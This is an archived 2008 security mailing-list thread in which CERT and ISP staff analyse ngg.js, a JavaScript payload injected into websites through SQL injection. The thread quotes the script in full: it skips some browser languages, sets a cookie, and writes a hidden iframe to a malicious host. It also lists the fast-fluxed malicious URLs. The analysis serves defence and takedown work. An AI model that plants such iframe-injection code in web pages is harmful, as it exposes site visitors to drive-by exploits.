[nsp-sec] Nasty fast-fluxed sites containing javascriptmalcode [FICORA #183472]

Fri Jul 11 16:27:18 EDT 2008

At least some of the sql injections have avoided victims in china.
If the comments I extracted are real it is due to their love of country
(china).

http://isc.sans.org/diary.html?date=2008-05-14

The site has already been mentioned multiple times (www.ririwow.cn,
which appears to be finally taken down). The majority of attacks
actually pointed to this site which happily served some exploits to the
end user. However, this time the main index.htm file had this text
appended at the bottom:
"This is a mass invasion.        Safeguard the motherland's dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276 at 163.com "

I am not faulting any country. This could have been a fornigner trying
to stir up something.
If you look here you will see that email address was used to registar
domains that were used to deliver exploits.

http://www.thinkdigit.com/forum/archive/index.php/t-88452.html
:"The invasion can not control bulk!!!!If the wrong target. Please
forgive! Sorry if you are a hacker. send email to kiss117276 at 163.com my
name is lonely-shadow TALK WITH ME! china is great! f**k france! f**k
CNN! f**k ! HACKER have matherland!"

Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com giac 

> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net 
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Alan
> Sent: Friday, July 11, 2008 3:07 AM
> To: 'Huopio Kauto'; nsp-security at puck.nether.net
> Subject: Re: [nsp-sec] Nasty fast-fluxed sites containing 
> javascriptmalcode [FICORA #183472]
> 
> ----------- nsp-security Confidential --------
> 
> Ngg.js according to the code
> ________________________________________
> window.status="";
> n=navigator.userLanguage.toUpperCase();
> if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")
> &&(n!="ZH")&&(
> n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
> var cookieString = document.cookie;
> var start = cookieString.indexOf("updngg=");
> if (start != -1){}else{
> var expires = new Date();
> expires.setTime(expires.getTime()+11*3600*1000);
> document.cookie = "updngg=update;expires="+expires.toGMTString();
> try{
> document.write("<iframe 
> src=http://destbnp.com/cgi-bin/index.cgi?ad width=0
> height=0 frameborder=0></iframe>");
> }
> catch(e)
> {
> };
> }}
> 
> ________________________________________
> 
> 1.not vulnerable to CN,TW,RU,KO..
> 2.other country will go into if statement, read cookie 
> value"updngg", if
> exists, will do nothing.. (it only effect the first time 
> browsing users, and
> the cookie period is 11 hr)
> We think this is to prevent analysis or some trigger condition.
> 3.condition meets then it will connect to the malicious iframe link.
> 
> And We think these hackers don't want to become a global 
> threats , because
> if it does, every security company will try to solve the sites,
> The other possibility is that many they have a uniq 0day exploit but
> targeting specified language version.
> That's why they use language to identify users 
> 
> 
> Regards,
> Alan Lee
> 
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of 
> Huopio Kauto
> Sent: Friday, July 11, 2008 4:13 PM
> To: nsp-security at puck.nether.net
> Subject: [nsp-sec] Nasty fast-fluxed sites containing 
> javascript malcode
> [FICORA #183472]
> 
> ----------- nsp-security Confidential --------
> 
> Hi folks,
> 
> The following URL:s relate to a javascript that we found
> in a finnish website. Very fresh domain registrations
> and heavily fast-fluxed. Any analysis?
> 
> Takedown of the domains and sites etc is more than welcome
> 
> > > hxxp://bkpadd.mobi/cgi-bin/index.cgi?ad
> > > hxxp://usaadw.com/cgi-bin/index.cgi?ad
> > > hxxp://drvadw.com/cgi-bin/index.cgi?ad
> > > hxxp://adwnetw.com/cgi-bin/index.cgi?ad
> > > hxxp://loopadd.com/cgi-bin/index.cgi?ad
> 
> This seems to be related with SQL injection attacks and
> ngg.js. Just google ngg.js..
> 
> --Kauto
> 
> Kauto Huopio - kauto.huopio at ficora.fi
> Senior information security adviser
> Finnish Communications Regulatory Authority  / CERT-FI
> tel. +358-9-6966772, fax +358-9-6966515, mobile +358-50-5826131
> CERT-FI watch desk daytime: +358-9-6966510
> CERT-FI 24/7 on-call duty officer: +358-44-0120123 / 
> http://www.cert.fi
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the 
> nsp-security
> community. Confidentiality is essential for effective 
> Internet security
> counter-measures.
> _______________________________________________
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the 
> nsp-security
> community. Confidentiality is essential for effective 
> Internet security counter-measures.
> _______________________________________________
> 
> 

This communication is the property of Qwest and may contain confidential or
privileged information. Unauthorized use of this communication is strictly 
prohibited and may be unlawful.  If you have received this communication 
in error, please immediately notify the sender by reply e-mail and destroy 
all copies of the communication and any attachments.